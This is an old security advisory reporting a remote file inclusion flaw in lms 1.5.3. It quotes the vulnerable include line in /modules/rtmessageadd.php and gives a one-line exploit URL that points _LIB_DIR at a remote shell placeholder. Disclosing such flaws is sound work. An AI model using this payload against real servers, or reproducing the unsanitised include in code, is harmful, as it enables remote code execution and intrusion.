Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16822
HistoryApr 24, 2007 - 12:00 a.m.

lms 1.5.3 Remote File Inclusion

2007-04-2400:00:00
vulners.com
14
                          lms 1.5.3 Remote File Inclusion
                      Affected Software .: lms 1.5.3 libs
                      Download..: http://www.lms.org.pl/download/1.5/
                      Risk ..............: high                              
                      Found by ..........: InyeXion                                                  
                      Contact ...........: InyeXion[at]gmail.com    
                      Web .............: Www.InyeXion.com.ar                               

     Affected File:                                                                
/modules/rtmessageadd.php

 Vulnerable Code:

Line 27 include($_LIB_DIR.'/multipart_mime_email.php');

Exploit:

http://[target]/modules/rtmessageadd.php?_LIB_DIR=Shell?


Fixed bug:

Update to last version

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~